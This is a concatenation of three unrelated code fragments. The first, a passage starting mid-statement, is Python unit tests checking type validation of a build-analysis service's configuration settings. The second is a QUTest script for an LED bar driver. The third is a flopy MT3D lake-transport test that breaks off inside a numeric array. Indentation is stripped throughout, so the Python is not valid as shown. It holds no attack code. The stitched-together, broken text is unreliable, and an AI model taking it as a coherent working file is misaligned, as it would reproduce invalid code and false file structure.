'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': [] # Should not be empty.
}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': [1] # Should be a list of strings.
}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': ['step3']
}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
'check_global': True # 'check_global' is optional.
},
},
'global': {
'unsupported_steps': ['step3']
}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'], # Should not be specified.
'check_global': False
},
},
'global': {
'unsupported_steps': ['step3']
}
}))
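
# The validator tolerates duplicate step names; the assertEqual that
# follows pins down exactly what the mapping contains after validation.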
def testValidatingMastersAndStepRulesRemovesDuplicates(self):
valid_rules_with_duplicates = {
'supported_masters': {
'master1': {
'supported_steps': ['step1', 'step1'],
'unsupported_steps': ['step2', 'step2'],
},
},
'global': {
'unsupported_steps': ['step3', 'step3']
}
}
self.assertTrue(
config._ValidateMastersAndStepsRulesMapping(
valid_rules_with_duplicates))
self.assertEqual(
{
'supported_masters': {
'master1': {
'supported_steps': ['step1', 'step1'],
'unsupported_steps': ['step2', 'step2'],
},
},
'global': {
'unsupported_steps': ['step3', 'step3']
}
},
valid_rules_with_duplicates)
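
# The trybot mapping is nested master -> builder -> settings; each failing
# case below corrupts the type of exactly one field.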
def testValidateTrybotMapping(self):
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
}
}
}))
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'flake_trybot': 'trybot1_flake'
}
}
}))
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'strict_regex': True,
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'strict_regex': 'a',
}
}
}))
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'not_run_tests': True,
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'not_run_tests': 1, # Should be a bool.
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': {}, # Should be a string.
'flake_trybot': 'trybot2',
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'flake_trybot': 1, # Should be a string.
}
}
}))
self.assertFalse(config._ValidateTrybotMapping(['a']))
self.assertFalse(config._ValidateTrybotMapping({'a': ['b']}))
self.assertFalse(config._ValidateTrybotMapping({'a': {'b': ['1']}}))
self.assertFalse(config._ValidateTrybotMapping({'a': {'b': {}}}))
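
# All four try-job settings must be ints; each failing case swaps one of
# them for a non-int value.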
def testValidateTryJobSettings(self):
self.assertFalse(config._ValidateTryJobSettings([]))
self.assertFalse(config._ValidateTryJobSettings({}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': '1', # Should be an int.
'job_timeout_hours': 1,
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 1
}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': 1,
'job_timeout_hours': '1', # Should be an int.
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 1
}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': 1,
'job_timeout_hours': 1,
'allowed_response_error_times': '1', # Should be an int.
'max_seconds_look_back_for_group': 1
}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': 1,
'job_timeout_hours': 1,
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 'a' # Should be an int.
}))
self.assertTrue(config._ValidateTryJobSettings(_MOCK_TRY_JOB_SETTINGS))
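
# Swarming settings mix string fields (hosts and URLs), int fields
# (priorities, timeouts, iteration counts) and one bool
# (should_retry_server); each failing case breaks exactly one field.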
def testValidateSwarmingSettings(self):
self.assertFalse(config._ValidateSwarmingSettings([]))
self.assertFalse(config._ValidateSwarmingSettings({}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': ['chromium-swarm.appspot.com'], # Should be a string.
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': '150', # Should be an int.
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': {}, # Should be an int.
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': [], # Should be an int.
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': None, # Should be an int.
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 1, # Should be a string.
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 3.2, # Should be a string.
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1.0, # Should be an int.
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': '300', # Should be an int.
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': [] # Should be an int.
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': {} # Should be an int.
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': 1,
'maximum_server_contact_retry_interval_seconds': '' # Should be an int.
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 1,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': 1,
'maximum_server_contact_retry_interval_seconds': 2,
'should_retry_server': 3 # Should be a bool.
}))
self.assertTrue(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': 1,
'maximum_server_contact_retry_interval_seconds': 1,
'should_retry_server': False,
}))
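
# The two interval/expiration settings must be ints and
# use_chrome_build_extract must be a bool.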
def testValidateDownloadBuildDataSettings(self):
self.assertFalse(config._ValidateDownloadBuildDataSettings({}))
self.assertFalse(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': {}, # Should be an int.
'memcache_master_download_expiration_seconds': 10,
'use_chrome_build_extract': True
}))
self.assertFalse(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': [], # Should be an int.
'use_chrome_build_extract': True
}))
self.assertFalse(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': 3600,
'use_chrome_build_extract': 'blabla' # Should be a bool.
}))
self.assertTrue(config._ValidateDownloadBuildDataSettings({
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': 3600,
'use_chrome_build_extract': False
}))

def testConfigurationDictIsValid(self):
self.assertTrue(config._ConfigurationDictIsValid({
'steps_for_masters_rules': {
'supported_masters': {
'master1': {
'unsupported_steps': ['step1', 'step2'],
},
'master2': {
'supported_steps': ['step3'],
'check_global': False
}
},
'global': {
'unsupported_steps': ['step5'],
}
}
}))
self.assertFalse(config._ConfigurationDictIsValid([]))
self.assertFalse(config._ConfigurationDictIsValid({
'this_is_not_a_valid_property': []
}))
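
# Timestamps are formatted to whole seconds; the microsecond component of
# the datetime is dropped.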
def testFormatTimestamp(self):
self.assertIsNone(config._FormatTimestamp(None))
self.assertEqual('2016-02-25 01:02:03',
config._FormatTimestamp(
datetime.datetime(2016, 2, 25, 1, 2, 3, 123456)))
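
# Posting a complete configuration as an admin should echo the stored
# settings back together with version metadata; 'updated_by' holds the
# user name with the email domain stripped.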
def testPostConfigurationSettings(self):
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
params = {
'format': 'json',
'data': json.dumps({
'steps_for_masters_rules': {
'supported_masters': {
'a': {
},
'b': {
'supported_steps': ['1'],
'unsupported_steps': ['2', '3', '4'],
},
'c': {
'supported_steps': ['5'],
'check_global': False
}
},
'global': {
'unsupported_steps': ['1']
}
},
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS
})
}
response = self.test_app.post('/config', params=params)
expected_response = {
'masters': {
'supported_masters': {
'a': {
},
'b': {
'supported_steps': ['1'],
'unsupported_steps': ['2', '3', '4'],
},
'c': {
'supported_steps': ['5'],
'check_global': False
}
},
'global': {
'unsupported_steps': ['1']
}
},
'builders': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS,
'version': 1,
'latest_version': 1,
'updated_by': 'test',
'updated_ts': response.json_body.get('updated_ts')
}
self.assertEqual(expected_response, response.json_body)

def testValidateActionSettings(self):
self.assertFalse(config._ValidateActionSettings({}))
self.assertTrue(config._ValidateActionSettings(
{
'cr_notification_build_threshold': 2,
'cr_notification_latency_limit_minutes': 1000,
}))
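
# The flake thresholds must be floats while the in-a-row counters and the
# iteration count must be ints.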
def testValidateFlakeAnalyzerTryJobRerunSettings(self):
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings({}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 1, # Should be a float.
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 'a', # Should be a float.
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': [], # Should be an int.
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': {}, # Should be an int.
'iterations_to_rerun': 100,
}))
self.assertFalse(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 3.2, # Should be an int.
}))
self.assertTrue(config._ValidateFlakeAnalyzerTryJobRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 4,
}))
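
# Same type checks as the try-job rerun settings, plus the swarming-only
# fields: max_build_numbers_to_look_back (int), use_nearby_neighbor and
# update_monorail_bug (bool), max_dive_in_a_row (int) and
# dive_rate_threshold (float).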
def testValidateFlakeAnalyzerSwarmingRerunSettings(self):
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings({}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 1, # Should be a float.
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 'a', # Should be a float.
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': [], # Should be an int.
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': {}, # Should be an int.
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 3.2, # Should be an int.
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 4,
'max_build_numbers_to_look_back': 'a', # Should be an int.
'use_nearby_neighbor': True
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 4,
'max_build_numbers_to_look_back': 100,
'use_nearby_neighbor': [] # Should be a bool.
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'update_monorail_bug': 'True', # Should be a bool.
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'update_monorail_bug': True,
'max_dive_in_a_row': 4.0, # Should be an int.
'dive_rate_threshold': 0.4,
}))
self.assertFalse(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'update_monorail_bug': True,
'dive_rate_threshold': 40, # Should be a float.
}))
self.assertTrue(config._ValidateFlakeAnalyzerSwarmingRerunSettings(
{
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'use_nearby_neighbor': True,
'update_monorail_bug': True,
'max_dive_in_a_row': 4,
'dive_rate_threshold': 0.4,
}))

# test-script for QUTest unit testing harness
# see https://www.state-machine.com/qtools/qutest.html
# preambe...
# tests...
test("LedBar 0% all off")
command(0, 0)
expect("@timestamp LED_MOD Led_off 0")
expect("@timestamp LED_MOD Led_off 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 0 0")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 100% all on", NORESET)
command(0, 100)
expect("@timestamp LED_MOD Led_on 10 0")
expect("@timestamp LED_MOD Led_on 20 1")
expect("@timestamp LED_MOD Led_on 10 2")
expect("@timestamp LED_MOD Led_on 20 3")
expect("@timestamp LED_MOD Led_on 10 4")
expect("@timestamp USER+000 LedBar_setPercent 70 100")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 19% all off", NORESET)
command(0, 19)
expect("@timestamp LED_MOD Led_off 0")
expect("@timestamp LED_MOD Led_off 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 0 19")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 20% one on", NORESET)
command(0, 20)
expect("@timestamp LED_MOD Led_on 10 0")
expect("@timestamp LED_MOD Led_off 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 10 20")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 50% two on", NORESET)
current_obj(OBJ_AP, 'led_power')
poke(0, 4, pack('<LL', 25, 15))
command(0, 50)
expect("@timestamp LED_MOD Led_on 25 0")
expect("@timestamp LED_MOD Led_on 15 1")
expect("@timestamp LED_MOD Led_off 2")
expect("@timestamp LED_MOD Led_off 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 40 50")
expect("@timestamp Trg-Done QS_RX_COMMAND")
test("LedBar 99% four on", NORESET)
probe('Led_on', 17)
probe('Led_on', 13)
command(0, 99)
expect("@timestamp TstProbe Fun=Led_on,Data=17")
expect("@timestamp LED_MOD Led_on 17 0")
expect("@timestamp TstProbe Fun=Led_on,Data=13")
expect("@timestamp LED_MOD Led_on 13 1")
expect("@timestamp LED_MOD Led_on 10 2")
expect("@timestamp LED_MOD Led_on 20 3")
expect("@timestamp LED_MOD Led_off 4")
expect("@timestamp USER+000 LedBar_setPercent 60 99")
expect("@timestamp Trg-Done QS_RX_COMMAND")

"""
Bug discovered in LKT with multi-species. Adding test to check this functionality
"""
import os
import sys
import platform
import numpy as np
import flopy
# make the working directory
tpth = os.path.join('temp', 't060')
if not os.path.isdir(tpth):
os.makedirs(tpth)
mfnwt_exe = 'mfnwt'
mt3d_usgs_exe = 'mt3dusgs'
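# flopy.which() returns the full path of an executable found on the system
# path (or None), so the actual model runs can be skipped when the
# MODFLOW-NWT / MT3D-USGS binaries are not available.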
ismfnwt = flopy.which(mfnwt_exe)
ismt3dusgs = flopy.which(mt3d_usgs_exe)


def test_lkt_with_multispecies():
modelpth = tpth
modelname = 'lkttest'
mfexe = 'mfnwt'
mtexe = 'mt3dusgs'
# Instantiate MODFLOW object in flopy
mf = flopy.modflow.Modflow(modelname=modelname, exe_name=mfexe, model_ws=modelpth, version='mfnwt')
Lx = 27500.0
Ly = 22000.0
nrow = 44
ncol = 55
nlay = 3
delr = Lx / ncol
delc = Ly / nrow
xmax = ncol * delr
ymax = nrow * delc
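# X and Y hold the cell-center coordinates of the grid (row 1 at the top).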
X, Y = np.meshgrid(np.linspace(delr / 2, xmax - delr / 2, ncol),
np.linspace(ymax - delc / 2, 0 + delc / 2, nrow))

## Instantiate output control (oc) package for MODFLOW-NWT
oc = flopy.modflow.ModflowOc(mf)

## Instantiate solver package for MODFLOW-NWT
# Newton-Raphson Solver: Create a flopy nwt package object
headtol = 1.0E-4
fluxtol = 5
maxiterout = 5000
thickfact = 1E-06
linmeth = 2
iprnwt = 1
ibotav = 1
nwt = flopy.modflow.ModflowNwt(mf, headtol=headtol, fluxtol=fluxtol, maxiterout=maxiterout,
thickfact=thickfact, linmeth=linmeth, iprnwt=iprnwt, ibotav=ibotav,
options='SIMPLE')

## Instantiate discretization (DIS) package for MODFLOW-NWT
top1 = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2.015692E+02, 2.01E+02, 2.02E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.99E+02, 2.00E+02, 2.01E+02, 2.015957E+02, 2.019755E+02, 2.02E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.52E+02, 0, 0, 0,
0, 0, 0, 0, 0, 1.93E+02, 1.935120E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.01E+02, 2.02E+02, 2.02E+02, 2.03E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.48E+02, 3.48E+02, 3.50E+02, 3.52E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.933555E+02, 1.94E+02, 1.95E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.019790E+02, 2.02E+02, 2.03E+02, 2.03E+02, 2.04E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.37E+02, 3.43E+02, 3.48E+02, 3.48E+02, 3.49E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.932550E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.36E+02, 3.36E+02, 3.43E+02, 3.48E+02, 3.48E+02, 0, 0,
0, 0, 0, 0, 0, 0, 1.93E+02, 1.933208E+02, 1.94E+02, 1.95E+02, 1.96E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.09E+02, 2.09E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3.19E+02, 3.19E+02, 3.29E+02, 3.36E+02, 3.36E+02, 3.36E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1.93E+02, 1.94E+02, 1.94E+02, 1.95E+02, 1.97E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.04E+02, 2.05E+02, 2.07E+02, 2.08E+02, 2.09E+02, 2.10E+02, 2.11E+02, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2.50E+02, 2.51E+02, 0, 0, 0, 0, 0, 0, 2.91E+02, 3.17E+02, 3.17E+02, 3.17E+02, 3.29E+02, 3.29E+02, 3.29E+02, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 1.94E+02, 1.95E+02, 1.96E+02, 1.98E+02, 2.00E+02, 2.01E+02, 2.02E+02, 2.03E+02, 2.05E+02, 2.06E+02, 2.07E+02, 2.08E+02, 2.10E+02, 2.11E+02, 2.12E+02, 2.17E+02, 2.18E+02, 2.21E+02, 2.23E+02, 2.24E+02, 2.25E+02, 0, 0, 0, 0, 0, 0, 2.48E+02, 2.49E+02, 2.50E+02, 2.51E+02, 2.52E+02, 2.59E+02, 2.63E+02, 2.67E+02, 2.73E+02, 2.88E+02, 2.91E+02, 3.03E+02, 3.10E+02, 3.10E+02, 3.17E+02, 3.17E+02, 3.17E+02, 0, 0,
